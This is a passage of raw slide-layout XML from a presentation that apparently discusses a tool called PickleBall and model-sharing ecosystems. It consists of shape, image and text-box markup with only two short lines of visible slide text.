                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>is compared to  State of the Art solutions.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="915" name="Google Shape;915;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294625"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916" name="Google Shape;916;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294637"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="917" name="Google Shape;917;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294631"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="918" name="Google Shape;918;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2317214"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="919" name="Google Shape;919;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="3533187"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="920" name="Google Shape;920;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="3533181"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="921" name="Google Shape;921;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="3448829"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="922" name="Google Shape;922;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904225"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904237"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="924" name="Google Shape;924;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904231"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="925" name="Google Shape;925;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2926814"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="Google Shape;926;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="4142787"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="927" name="Google Shape;927;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="4142781"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="928" name="Google Shape;928;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="4058429"/>
            <a:ext cx="516250" cy="456764"/>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1" name="Shape 351"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p32"/>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353" name="Google Shape;353;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Model Ecosystem Facilitates Model Sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="354" name="Google Shape;354;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785409" y="2972484"/>
            <a:ext cx="985001" cy="985001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964510" y="1117031"/>
            <a:ext cx="3408600" cy="1220100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="E0E0F1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="356" name="Google Shape;356;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051911" y="1028484"/>
            <a:ext cx="3057969" cy="1129096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;357;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358" name="Google Shape;358;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8991">
            <a:off x="5105893" y="1986951"/>
            <a:ext cx="344101" cy="903300"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Google Shape;360;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10791009">
            <a:off x="7863409" y="1987810"/>
            <a:ext cx="344101" cy="902700"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="362" name="Google Shape;362;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897095" y="2693482"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;364;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897095" y="2693470"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Google Shape;365;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6152519" y="3139570"/>
            <a:ext cx="975450" cy="975450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Google Shape;366;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-3029">
            <a:off x="6481201" y="1986862"/>
            <a:ext cx="340500" cy="894600"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8550">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
